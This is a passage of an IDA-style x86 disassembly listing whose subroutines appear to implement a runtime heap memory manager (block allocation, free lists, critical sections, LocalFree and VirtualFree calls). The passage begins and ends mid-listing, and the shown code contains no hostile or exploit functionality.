sub_4017AC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401870 proc near ; CODE XREF: sub_403B34+37�p
push ebp
mov ebp, esp
push ebx
cmp ds:byte_4075AC, 0
jz loc_40194D
xor edx, edx
push ebp
push offset loc_401946
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_407035, 0
jz short loc_4018A2
push offset dword_4075B4
call sub_401108 ; RtlEnterCriticalSection
loc_4018A2: ; CODE XREF: sub_401870+26�j
mov ds:byte_4075AC, 0
mov eax, ds:dword_40760C
push eax
call sub_4010E8 ; LocalFree
xor eax, eax
mov ds:dword_40760C, eax
mov ebx, ds:off_4075D4
jmp short loc_4018D5
; ---------------------------------------------------------------------------
loc_4018C3: ; CODE XREF: sub_401870+6B�j
push 8000h
push 0
mov eax, [ebx+8]
push eax
call sub_4010F8 ; VirtualFree
mov ebx, [ebx]
loc_4018D5: ; CODE XREF: sub_401870+51�j
cmp ebx, offset off_4075D4
jnz short loc_4018C3
mov eax, offset off_4075D4
call sub_401170
mov eax, offset off_4075E4
call sub_401170
mov eax, offset off_407610
call sub_401170
mov eax, ds:dword_4075CC
test eax, eax
jz short loc_40191B
loc_401904: ; CODE XREF: sub_401870+A9�j
mov edx, [eax]
mov ds:dword_4075CC, edx
push eax
call sub_4010E8 ; LocalFree
mov eax, ds:dword_4075CC
test eax, eax
jnz short loc_401904
loc_40191B: ; CODE XREF: sub_401870+92�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40194D
loc_401928: ; CODE XREF: sub_401870+DB�j
cmp ds:byte_407035, 0
jz short loc_40193B
push offset dword_4075B4
call sub_401110 ; RtlLeaveCriticalSection
loc_40193B: ; CODE XREF: sub_401870+BF�j
push offset dword_4075B4
call sub_401118 ; RtlDeleteCriticalSection
retn
; ---------------------------------------------------------------------------
loc_401946: ; DATA XREF: sub_401870+14�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_401928
; ---------------------------------------------------------------------------
loc_40194D: ; CODE XREF: sub_401870+B�j
; DATA XREF: sub_401870+B3�o
pop ebx
pop ebp
retn
sub_401870 endp
; =============== S U B R O U T I N E =======================================
sub_401950 proc near ; CODE XREF: sub_401A60:loc_401AC1�p
; sub_401AD0+23�p ...
push ebx
cmp eax, ds:off_407600
jnz short loc_401962
mov edx, [eax+4]
mov ds:off_407600, edx
loc_401962: ; CODE XREF: sub_401950+7�j
mov edx, [eax+4]
mov ecx, [eax+8]
cmp ecx, 1000h
jg short loc_4019A8
cmp eax, edx
jnz short loc_40198B
test ecx, ecx
jns short loc_40197B
add ecx, 3
loc_40197B: ; CODE XREF: sub_401950+26�j
sar ecx, 2
mov eax, ds:dword_40760C
xor edx, edx
mov [eax+ecx*4-0Ch], edx
jmp short loc_4019AF
; ---------------------------------------------------------------------------
loc_40198B: ; CODE XREF: sub_401950+22�j
test ecx, ecx
jns short loc_401992
add ecx, 3
loc_401992: ; CODE XREF: sub_401950+3D�j
sar ecx, 2
mov ebx, ds:dword_40760C
mov [ebx+ecx*4-0Ch], edx
mov eax, [eax]
mov [edx], eax
mov [eax+4], edx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4019A8: ; CODE XREF: sub_401950+1E�j
mov eax, [eax]
mov [edx], eax
mov [eax+4], edx
loc_4019AF: ; CODE XREF: sub_401950+39�j
pop ebx
retn
sub_401950 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4019B4 proc near ; CODE XREF: sub_401B08+11�p
mov edx, ds:off_407610
jmp short loc_4019CC
; ---------------------------------------------------------------------------
loc_4019BC: ; CODE XREF: sub_4019B4+1E�j
mov ecx, [edx+8]
cmp eax, ecx
jb short loc_4019CA
add ecx, [edx+0Ch]
cmp eax, ecx
jb short loc_4019E0
loc_4019CA: ; CODE XREF: sub_4019B4+D�j
mov edx, [edx]
loc_4019CC: ; CODE XREF: sub_4019B4+6�j
cmp edx, offset off_407610
jnz short loc_4019BC
mov ds:dword_4075B0, 3
xor edx, edx
loc_4019E0: ; CODE XREF: sub_4019B4+14�j
mov eax, edx
retn
sub_4019B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4019E4 proc near ; CODE XREF: sub_401B08+74�p
; sub_401C8C+68�p
push ebx
mov ecx, edx
sub ecx, 4
lea ebx, [ecx+eax]
cmp edx, 10h
jl short loc_401A01
mov dword ptr [ebx], 80000007h
mov edx, ecx
call sub_401BB8
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401A01: ; CODE XREF: sub_4019E4+C�j
cmp edx, 4
jl short loc_401A12
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
mov [ebx], ecx
loc_401A12: ; CODE XREF: sub_4019E4+20�j
pop ebx
retn
sub_4019E4 endp
; =============== S U B R O U T I N E =======================================
sub_401A14 proc near ; CODE XREF: sub_401A38+D�p
; sub_401C40+36�p ...
inc ds:dword_40759C
mov edx, eax
sub edx, 4
mov edx, [edx]
and edx, 7FFFFFFCh
sub edx, 4
add ds:dword_4075A0, edx
call sub_402028
retn
sub_401A14 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401A38 proc near ; CODE XREF: sub_401B08+8E�p
cmp edx, 0Ch
jl short loc_401A4B
or edx, 2
mov [eax], edx
add eax, 4
call sub_401A14
retn
; ---------------------------------------------------------------------------
loc_401A4B: ; CODE XREF: sub_401A38+3�j
cmp edx, 4
jl short loc_401A5A
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
loc_401A5A: ; CODE XREF: sub_401A38+16�j
add eax, edx
and dword ptr [eax], 0FFFFFFFEh
retn
sub_401A38 endp
; =============== S U B R O U T I N E =======================================
sub_401A60 proc near ; CODE XREF: sub_401C8C+36�p
push ebx
push esi
mov edx, eax
sub edx, 4
mov edx, [edx]
mov ecx, edx
and ecx, 80000002h
cmp ecx, 80000002h
jz short loc_401A83
mov ds:dword_4075B0, 4
loc_401A83: ; CODE XREF: sub_401A60+17�j
mov ebx, edx
and ebx, 7FFFFFFCh
sub eax, ebx
mov ecx, eax
xor edx, [ecx]
test edx, 0FFFFFFFEh
jz short loc_401AA3
mov ds:dword_4075B0, 5
loc_401AA3: ; CODE XREF: sub_401A60+37�j
test byte ptr [ecx], 1
jz short loc_401AC8
mov edx, eax
sub edx, 0Ch
mov esi, [edx+8]
sub eax, esi
cmp esi, [eax+8]
jz short loc_401AC1
mov ds:dword_4075B0, 6
loc_401AC1: ; CODE XREF: sub_401A60+55�j
call sub_401950
add ebx, esi
loc_401AC8: ; CODE XREF: sub_401A60+46�j
mov eax, ebx
pop esi
pop ebx
retn
sub_401A60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401AD0 proc near ; CODE XREF: sub_401C8C+4F�p
push ebx
push esi
push edi
mov ebx, eax
xor edi, edi
mov eax, [ebx]
test eax, 80000000h
jz short loc_401AEB
and eax, 7FFFFFFCh
add edi, eax
add ebx, eax
mov eax, [ebx]
loc_401AEB: ; CODE XREF: sub_401AD0+E�j
test al, 2
jnz short loc_401B02
mov esi, ebx
mov eax, esi
call sub_401950
mov eax, [esi+8]
add edi, eax
add ebx, eax
and dword ptr [ebx], 0FFFFFFFEh
loc_401B02: ; CODE XREF: sub_401AD0+1D�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_401AD0 endp
; =============== S U B R O U T I N E =======================================
sub_401B08 proc near ; CODE XREF: sub_401BB8+61�p
var_1C = byte ptr -1Ch
var_1B = dword ptr -1Bh
var_17 = dword ptr -17h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov edi, edx
mov esi, eax
mov [esp+1Ch+var_1C], 0
mov eax, esi
call sub_4019B4
mov ebx, eax
test ebx, ebx
jz loc_401BAA
mov ebp, [ebx+8]
mov eax, ebp
add eax, [ebx+0Ch]
mov edx, eax
lea ecx, [edi+esi]
sub edx, ecx
cmp edx, 0Ch
jg short loc_401B40
mov edi, eax
sub edi, esi
loc_401B40: ; CODE XREF: sub_401B08+32�j
mov eax, esi
sub eax, ebp
cmp eax, 0Ch
jge short loc_401B5D
lea ecx, [esp+1Ch+var_1B]
mov edx, esi
sub edx, [ebx+8]
add edx, edi
mov eax, ebp
call sub_401720
jmp short loc_401B6E
; ---------------------------------------------------------------------------
loc_401B5D: ; CODE XREF: sub_401B08+3F�j
lea ecx, [esp+1Ch+var_1B]
mov edx, edi
sub edx, 4
lea eax, [esi+4]
call sub_401720
loc_401B6E: ; CODE XREF: sub_401B08+53�j
mov ebp, [esp+1Ch+var_1B]
test ebp, ebp
jz short loc_401BAA
mov edx, ebp
sub edx, esi
mov eax, esi
call sub_4019E4
mov eax, ebp
add eax, [esp+1Ch+var_17]
mov edx, [ebx+8]
add edx, [ebx+0Ch]
cmp eax, edx
jnb short loc_401B9B
lea edx, [edi+esi]
sub edx, eax
call sub_401A38
loc_401B9B: ; CODE XREF: sub_401B08+87�j
lea edx, [esp+1Ch+var_1B]
mov eax, ebx
call sub_401230
mov [esp+1Ch+var_1C], 1
loc_401BAA: ; CODE XREF: sub_401B08+1A�j
; sub_401B08+6C�j
mov al, [esp+1Ch+var_1C]
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401B08 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401BB8 proc near ; CODE XREF: sub_4019E4+16�p
; sub_401DA4+BB�p ...
push ebx
push esi
push edi
mov esi, edx
mov edi, eax
mov ebx, edi
mov [ebx+8], esi
mov eax, ebx
add eax, esi
sub eax, 0Ch
mov [eax+8], esi
cmp esi, 1000h
jg short loc_401C0D
mov edx, esi
test edx, edx
jns short loc_401BDF
add edx, 3
loc_401BDF: ; CODE XREF: sub_401BB8+22�j
sar edx, 2
mov eax, ds:dword_40760C
mov eax, [eax+edx*4-0Ch]
test eax, eax
jnz short loc_401BFF
mov eax, ds:dword_40760C
mov [eax+edx*4-0Ch], ebx
mov [ebx+4], ebx
mov [ebx], ebx
jmp short loc_401C39
; ---------------------------------------------------------------------------
loc_401BFF: ; CODE XREF: sub_401BB8+35�j
mov edx, [eax]
mov [ebx+4], eax
mov [ebx], edx
mov [eax], ebx
mov [edx+4], ebx
jmp short loc_401C39
; ---------------------------------------------------------------------------
loc_401C0D: ; CODE XREF: sub_401BB8+1C�j
cmp esi, 3C00h
jl short loc_401C22
mov edx, esi
mov eax, edi
call sub_401B08
test al, al
jnz short loc_401C39
loc_401C22: ; CODE XREF: sub_401BB8+5B�j
mov eax, ds:off_407600
mov ds:off_407600, ebx
mov edx, [eax]
mov [ebx+4], eax
mov [ebx], edx
mov [eax], ebx
mov [edx+4], ebx
loc_401C39: ; CODE XREF: sub_401BB8+45�j
; sub_401BB8+53�j ...
pop edi
pop esi
pop ebx
retn
sub_401BB8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C40 proc near ; CODE XREF: sub_401C8C+F�p
; sub_402028+100�p ...
cmp ds:dword_407604, 0
jle short locret_401C89
cmp ds:dword_407604, 0Ch
jge short loc_401C5E
mov ds:dword_4075B0, 7
jmp short locret_401C89
; ---------------------------------------------------------------------------
loc_401C5E: ; CODE XREF: sub_401C40+10�j
mov eax, ds:dword_407604
or eax, 2
mov edx, ds:dword_407608
mov [edx], eax
mov eax, ds:dword_407608
add eax, 4
call sub_401A14
xor eax, eax
mov ds:dword_407608, eax
xor eax, eax
mov ds:dword_407604, eax
locret_401C89: ; CODE XREF: sub_401C40+7�j
; sub_401C40+1C�j
retn
sub_401C40 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401C8C proc near ; CODE XREF: sub_401D18+18�p
; sub_401D44+1D�p
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFF0h
mov esi, eax
lea edi, [esp+1Ch+var_1C]
movsd
movsd
mov edi, esp
call sub_401C40
lea ecx, [esp+1Ch+var_14]
mov edx, edi
mov eax, offset off_407610
call sub_4011C0
mov ebx, [esp+1Ch+var_14]
test ebx, ebx
jnz short loc_401CBC
xor eax, eax
jmp short loc_401D0E
; ---------------------------------------------------------------------------
loc_401CBC: ; CODE XREF: sub_401C8C+2A�j
mov eax, [edi]
cmp ebx, eax
jnb short loc_401CCC
call sub_401A60
sub [edi], eax
add [edi+4], eax
loc_401CCC: ; CODE XREF: sub_401C8C+34�j
mov eax, [edi]
add eax, [edi+4]
mov esi, ebx
add esi, [esp+1Ch+var_10]
cmp eax, esi
jnb short loc_401CE3
call sub_401AD0
add [edi+4], eax
loc_401CE3: ; CODE XREF: sub_401C8C+4D�j
mov eax, [edi]
add eax, [edi+4]
cmp esi, eax
jnz short loc_401CFD
sub eax, 4
mov edx, 4
call sub_4019E4
sub dword ptr [edi+4], 4
loc_401CFD: ; CODE XREF: sub_401C8C+5E�j
mov eax, [edi]
mov ds:dword_407608, eax
mov eax, [edi+4]
mov ds:dword_407604, eax
mov al, 1
loc_401D0E: ; CODE XREF: sub_401C8C+2E�j
add esp, 10h
pop edi
pop esi
pop ebx
retn
sub_401C8C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401D18 proc near ; CODE XREF: sub_401DA4+57�p
var_C = dword ptr -0Ch
push ebx
add esp, 0FFFFFFF8h
mov ebx, eax
mov edx, esp
lea eax, [ebx+4]
call sub_40156C
cmp [esp+0Ch+var_C], 0
jz short loc_401D39
mov eax, esp
call sub_401C8C
test al, al
jnz short loc_401D3D
loc_401D39: ; CODE XREF: sub_401D18+14�j
xor eax, eax
jmp short loc_401D3F
; ---------------------------------------------------------------------------
loc_401D3D: ; CODE XREF: sub_401D18+1F�j
mov al, 1
loc_401D3F: ; CODE XREF: sub_401D18+23�j
pop ecx
pop edx
pop ebx
retn
sub_401D18 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401D44 proc near ; CODE XREF: sub_4021CC+1A4�p
var_10 = dword ptr -10h
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, edx
mov ebx, eax
mov ecx, esp
lea edx, [esi+4]
mov eax, ebx
call sub_4015FC
cmp [esp+10h+var_10], 0
jz short loc_401D6A
mov eax, esp
call sub_401C8C
test al, al
jnz short loc_401D6E
loc_401D6A: ; CODE XREF: sub_401D44+19�j
xor eax, eax
jmp short loc_401D70
; ---------------------------------------------------------------------------
loc_401D6E: ; CODE XREF: sub_401D44+24�j
mov al, 1
loc_401D70: ; CODE XREF: sub_401D44+28�j
pop ecx
pop edx
pop esi
pop ebx
retn
sub_401D44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401D78 proc near ; CODE XREF: sub_401DA4+4A�p
xor edx, edx
test eax, eax
jns short loc_401D81
add eax, 3
loc_401D81: ; CODE XREF: sub_401D78+4�j
sar eax, 2
cmp eax, 400h
jg short loc_401DA1
loc_401D8B: ; CODE XREF: sub_401D78+27�j
mov edx, ds:dword_40760C
mov edx, [edx+eax*4-0Ch]
test edx, edx
jnz short loc_401DA1
inc eax
cmp eax, 401h
jnz short loc_401D8B
loc_401DA1: ; CODE XREF: sub_401D78+11�j
; sub_401D78+1F�j
mov eax, edx
retn
sub_401D78 endp
; =============== S U B R O U T I N E =======================================
sub_401DA4 proc near ; CODE XREF: sub_401E98+153�p
push ebx
push esi
push edi
push ebp
mov esi, eax
mov edi, offset off_407600
mov ebp, offset dword_407604
loc_401DB4: ; CODE XREF: sub_401DA4+6A�j
mov ebx, ds:off_4075F8
cmp esi, [ebx+8]
jle loc_401E47
mov ebx, [edi]
mov eax, [ebx+8]
cmp esi, eax
jle short loc_401E47
mov [ebx+8], esi
loc_401DCF: ; CODE XREF: sub_401DA4+31�j
mov ebx, [ebx+4]
cmp esi, [ebx+8]
jg short loc_401DCF
mov edx, [edi]
mov [edx+8], eax
cmp ebx, [edi]
jz short loc_401DE4
mov [edi], ebx
jmp short loc_401E47
; ---------------------------------------------------------------------------
loc_401DE4: ; CODE XREF: sub_401DA4+3A�j
cmp esi, 1000h
jg short loc_401DF9
mov eax, esi
call sub_401D78
mov ebx, eax
test ebx, ebx
jnz short loc_401E47
loc_401DF9: ; CODE XREF: sub_401DA4+46�j
mov eax, esi
call sub_401D18
test al, al
jnz short loc_401E0B
xor eax, eax
jmp loc_401E93
; ---------------------------------------------------------------------------
loc_401E0B: ; CODE XREF: sub_401DA4+5E�j
cmp esi, [ebp+0]
jg short loc_401DB4
sub [ebp+0], esi
cmp dword ptr [ebp+0], 0Ch
jge short loc_401E21
add esi, [ebp+0]
xor eax, eax
mov [ebp+0], eax
loc_401E21: ; CODE XREF: sub_401DA4+73�j
mov eax, ds:dword_407608
add ds:dword_407608, esi
mov edx, esi
or edx, 2
mov [eax], edx
add eax, 4
inc ds:dword_40759C
sub esi, 4
add ds:dword_4075A0, esi
jmp short loc_401E93
; ---------------------------------------------------------------------------
loc_401E47: ; CODE XREF: sub_401DA4+19�j
; sub_401DA4+26�j ...
mov eax, ebx
call sub_401950
mov edx, [ebx+8]
mov eax, edx
sub eax, esi
cmp eax, 0Ch
jl short loc_401E66
mov edx, ebx
add edx, esi
xchg eax, edx
call sub_401BB8
jmp short loc_401E78
; ---------------------------------------------------------------------------
loc_401E66: ; CODE XREF: sub_401DA4+B4�j
mov esi, edx
cmp ebx, [edi]
jnz short loc_401E71
mov eax, [ebx+4]
mov [edi], eax
loc_401E71: ; CODE XREF: sub_401DA4+C6�j
mov eax, ebx
add eax, esi
and dword ptr [eax], 0FFFFFFFEh
loc_401E78: ; CODE XREF: sub_401DA4+C0�j
mov eax, ebx
mov edx, esi
or edx, 2
mov [eax], edx
add eax, 4
inc ds:dword_40759C
sub esi, 4
add ds:dword_4075A0, esi
loc_401E93: ; CODE XREF: sub_401DA4+62�j
; sub_401DA4+A1�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401DA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E98 proc near ; CODE XREF: sub_4023A8+5C�p
; sub_40246C+5�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov ebx, eax
cmp ds:byte_4075AC, 0
jnz short loc_401EB5
call sub_4017AC
test al, al
jz short loc_401EBD
loc_401EB5: ; CODE XREF: sub_401E98+12�j
cmp ebx, 7FFFFFF8h
jle short loc_401EC7
loc_401EBD: ; CODE XREF: sub_401E98+1B�j
xor eax, eax
mov [ebp+var_4], eax
jmp loc_40201B
; ---------------------------------------------------------------------------
loc_401EC7: ; CODE XREF: sub_401E98+23�j
xor ecx, ecx
push ebp
push offset loc_402014
push dword ptr fs:[ecx]
mov fs:[ecx], esp
cmp ds:byte_407035, 0
jz short loc_401EE8
push offset dword_4075B4
call sub_401108 ; RtlEnterCriticalSection
loc_401EE8: ; CODE XREF: sub_401E98+44�j
add ebx, 7
and ebx, 0FFFFFFFCh
cmp ebx, 0Ch
jge short loc_401EF8
mov ebx, 0Ch
loc_401EF8: ; CODE XREF: sub_401E98+59�j
cmp ebx, 1000h
jg loc_401F97
mov eax, ebx
test eax, eax
jns short loc_401F0D
add eax, 3
loc_401F0D: ; CODE XREF: sub_401E98+70�j
sar eax, 2
mov edx, ds:dword_40760C
mov edx, [edx+eax*4-0Ch]
test edx, edx
jz short loc_401F97
mov esi, edx
mov eax, esi
add eax, ebx
and dword ptr [eax], 0FFFFFFFEh
mov eax, [edx+4]
cmp edx, eax
jnz short loc_401F48
mov eax, ebx
test eax, eax
jns short loc_401F37
add eax, 3
loc_401F37: ; CODE XREF: sub_401E98+9A�j
sar eax, 2
mov ecx, ds:dword_40760C
xor edi, edi
mov [ecx+eax*4-0Ch], edi
jmp short loc_401F6E
; ---------------------------------------------------------------------------
loc_401F48: ; CODE XREF: sub_401E98+94�j
mov ecx, ebx
test ecx, ecx
jns short loc_401F51
add ecx, 3
loc_401F51: ; CODE XREF: sub_401E98+B4�j
sar ecx, 2
mov edi, ds:dword_40760C
mov [edi+ecx*4-0Ch], eax
mov ecx, [edx]
mov [ebp+var_8], ecx
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov ecx, [ebp+var_8]
mov [eax], ecx
loc_401F6E: ; CODE XREF: sub_401E98+AE�j
mov eax, esi
mov edx, [edx+8]
or edx, 2
mov [eax], edx
add eax, 4
mov [ebp+var_4], eax
inc ds:dword_40759C
sub ebx, 4
add ds:dword_4075A0, ebx
call sub_402C70
jmp loc_40201B
; ---------------------------------------------------------------------------
loc_401F97: ; CODE XREF: sub_401E98+66�j
; sub_401E98+84�j
cmp ebx, ds:dword_407604
jg short loc_401FE9
sub ds:dword_407604, ebx
cmp ds:dword_407604, 0Ch
jge short loc_401FBB
add ebx, ds:dword_407604
xor eax, eax
mov ds:dword_407604, eax
loc_401FBB: ; CODE XREF: sub_401E98+114�j
mov eax, ds:dword_407608
add ds:dword_407608, ebx
mov edx, ebx
or edx, 2
mov [eax], edx
add eax, 4
mov [ebp+var_4], eax
inc ds:dword_40759C
sub ebx, 4
add ds:dword_4075A0, ebx
call sub_402C70
jmp short loc_40201B
; ---------------------------------------------------------------------------
loc_401FE9: ; CODE XREF: sub_401E98+105�j
mov eax, ebx
call sub_401DA4
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40201B
loc_402000: ; CODE XREF: sub_401E98+181�j
cmp ds:byte_407035, 0
jz short locret_402013
push offset dword_4075B4
call sub_401110 ; RtlLeaveCriticalSection
locret_402013: ; CODE XREF: sub_401E98+16F�j
retn
; ---------------------------------------------------------------------------
loc_402014: ; DATA XREF: sub_401E98+32�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_402000
; ---------------------------------------------------------------------------
loc_40201B: ; CODE XREF: sub_401E98+2A�j
; sub_401E98+FA�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_401E98 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402028 proc near ; CODE XREF: sub_401A14+1C�p
; sub_4023A8+88�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov ebx, eax
xor eax, eax
mov ds:dword_4075B0, eax
cmp ds:byte_4075AC, 0
jnz short loc_402060
call sub_4017AC
test al, al
jnz short loc_402060
mov ds:dword_4075B0, 8
mov [ebp+var_4], 8
jmp loc_4021C1
; ---------------------------------------------------------------------------
loc_402060: ; CODE XREF: sub_402028+17�j
; sub_402028+20�j
xor ecx, ecx
push ebp
push offset loc_4021BA
push dword ptr fs:[ecx]
mov fs:[ecx], esp
cmp ds:byte_407035, 0
jz short loc_402081
push offset dword_4075B4
call sub_401108 ; RtlEnterCriticalSection
loc_402081: ; CODE XREF: sub_402028+4D�j
mov esi, ebx
sub esi, 4
mov ebx, [esi]
test bl, 2
jnz short loc_40209C
mov ds:dword_4075B0, 9
jmp loc_402191
; ---------------------------------------------------------------------------
loc_40209C: ; CODE XREF: sub_402028+63�j
dec ds:dword_40759C
mov eax, ebx
and eax, 7FFFFFFCh
sub eax, 4
sub ds:dword_4075A0, eax
test bl, 1
jz short loc_4020FC
mov eax, esi
sub eax, 0Ch
mov edx, [eax+8]
cmp edx, 0Ch
jl short loc_4020CC
test edx, 80000003h
jz short loc_4020DB
loc_4020CC: ; CODE XREF: sub_402028+9A�j
mov ds:dword_4075B0, 0Ah
jmp loc_402191
; ---------------------------------------------------------------------------
loc_4020DB: ; CODE XREF: sub_402028+A2�j
mov eax, esi
sub eax, edx
cmp edx, [eax+8]
jz short loc_4020F3
mov ds:dword_4075B0, 0Ah
jmp loc_402191
; ---------------------------------------------------------------------------
loc_4020F3: ; CODE XREF: sub_402028+BA�j
add ebx, edx
mov esi, eax
call sub_401950
loc_4020FC: ; CODE XREF: sub_402028+8D�j
and ebx, 7FFFFFFCh
mov eax, esi
add eax, ebx
mov edi, eax
cmp edi, ds:dword_407608
jnz short loc_40213C
sub ds:dword_407608, ebx
add ds:dword_407604, ebx
cmp ds:dword_407604, 3C00h
jle short loc_40212D
call sub_401C40
loc_40212D: ; CODE XREF: sub_402028+FE�j
xor eax, eax
mov [ebp+var_4], eax
call sub_402C70
jmp loc_4021C1
; ---------------------------------------------------------------------------
loc_40213C: ; CODE XREF: sub_402028+E6�j
mov edx, [eax]
test dl, 2
jz short loc_40215F
and edx, 7FFFFFFCh
cmp edx, 4
jge short loc_40215A
mov ds:dword_4075B0, 0Bh
jmp short loc_402191
; ---------------------------------------------------------------------------
loc_40215A: ; CODE XREF: sub_402028+124�j
or dword ptr [eax], 1
jmp short loc_402188
; ---------------------------------------------------------------------------
loc_40215F: ; CODE XREF: sub_402028+119�j
mov eax, edi
cmp dword ptr [eax+4], 0
jz short loc_402172
cmp dword ptr [eax], 0
jz short loc_402172
cmp dword ptr [eax+8], 0Ch
jge short loc_40217E
loc_402172: ; CODE XREF: sub_402028+13D�j
; sub_402028+142�j
mov ds:dword_4075B0, 0Bh
jmp short loc_402191
; ---------------------------------------------------------------------------
loc_40217E: ; CODE XREF: sub_402028+148�j
mov edx, [eax+8]
add ebx, edx
call sub_401950
loc_402188: ; CODE XREF: sub_402028+135�j
mov edx, ebx
mov eax, esi
call sub_401BB8
loc_402191: ; CODE XREF: sub_402028+6F�j
; sub_402028+AE�j ...
mov eax, ds:dword_4075B0
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4021C1
loc_4021A6: ; CODE XREF: sub_402028+197�j
cmp ds:byte_407035, 0
jz short locret_4021B9
push offset dword_4075B4
call sub_401110 ; RtlLeaveCriticalSection
locret_4021B9: ; CODE XREF: sub_402028+185�j
retn
; ---------------------------------------------------------------------------
loc_4021BA: ; DATA XREF: sub_402028+3B�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_4021A6
; ---------------------------------------------------------------------------
loc_4021C1: ; CODE XREF: sub_402028+33�j
; sub_402028+10F�j
; DATA XREF: ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_402028 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4021CC proc near ; CODE XREF: sub_4023A8+4C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov esi, edx
add esi, 7
and esi, 0FFFFFFFCh
cmp esi, 0Ch
jge short loc_4021E5
mov esi, 0Ch
loc_4021E5: ; CODE XREF: sub_4021CC+12�j
mov ebp, eax
sub ebp, 4
mov edi, [ebp+0]
and edi, 7FFFFFFCh
mov eax, ebp
add eax, edi
mov ebx, eax
cmp edi, esi
jnz short loc_402204
mov al, 1
jmp loc_40239F
; ---------------------------------------------------------------------------
loc_402204: ; CODE XREF: sub_4021CC+2F�j
cmp edi, esi
jle loc_40228F
mov edx, edi
sub edx, esi
mov [esp+18h+var_18], edx
cmp ebx, ds:dword_407608
jnz short loc_402253
mov eax, [esp+18h+var_18]
sub ds:dword_407608, eax
mov eax, [esp+18h+var_18]
add ds:dword_407604, eax
cmp ds:dword_407604, 0Ch
jge loc_402386
mov eax, [esp+18h+var_18]
add ds:dword_407608, eax
mov eax, [esp+18h+var_18]
sub ds:dword_407604, eax
mov esi, edi
jmp loc_402386
; ---------------------------------------------------------------------------
loc_402253: ; CODE XREF: sub_4021CC+4D�j
mov ebx, eax
test byte ptr [ebx], 2
jnz short loc_402267
mov eax, ebx
mov edx, [eax+8]
add [esp+18h+var_18], edx
call sub_401950
loc_402267: ; CODE XREF: sub_4021CC+8C�j
cmp [esp+18h+var_18], 0Ch
jl short loc_402288
mov ebx, ebp
add ebx, esi
mov eax, [esp+18h+var_18]
or eax, 2
mov [ebx], eax
mov eax, ebx
add eax, 4
call sub_401A14
jmp loc_402386
; ---------------------------------------------------------------------------
loc_402288: ; CODE XREF: sub_4021CC+9F�j
mov esi, edi
jmp loc_402386
; ---------------------------------------------------------------------------
loc_40228F: ; CODE XREF: sub_4021CC+3A�j
; sub_4021CC+1B1�j
mov eax, esi
sub eax, edi
mov [esp+18h+var_14], eax
cmp ebx, ds:dword_407608
jnz short loc_402306
mov eax, ds:dword_407604
cmp eax, [esp+18h+var_14]
jl short loc_4022FD
mov eax, [esp+18h+var_14]
sub ds:dword_407604, eax
mov eax, [esp+18h+var_14]
add ds:dword_407608, eax
cmp ds:dword_407604, 0Ch
jge short loc_4022DF
mov eax, ds:dword_407604
add ds:dword_407608, eax
add esi, ds:dword_407604
xor eax, eax
mov ds:dword_407604, eax
loc_4022DF: ; CODE XREF: sub_4021CC+F9�j
mov eax, esi
sub eax, edi
add ds:dword_4075A0, eax
mov eax, [ebp+0]
and eax, 80000003h
or esi, eax
mov [ebp+0], esi
mov al, 1
jmp loc_40239F
; ---------------------------------------------------------------------------
loc_4022FD: ; CODE XREF: sub_4021CC+DC�j
call sub_401C40
mov ebx, ebp
add ebx, edi
loc_402306: ; CODE XREF: sub_4021CC+D1�j
test byte ptr [ebx], 2
jnz short loc_402358
mov edx, ebx
mov eax, edx
mov ecx, [eax+8]
mov [esp+18h+var_18], ecx
mov ecx, [esp+18h+var_18]
cmp ecx, [esp+18h+var_14]
jge short loc_40232C
add edx, [esp+18h+var_18]
mov ebx, edx
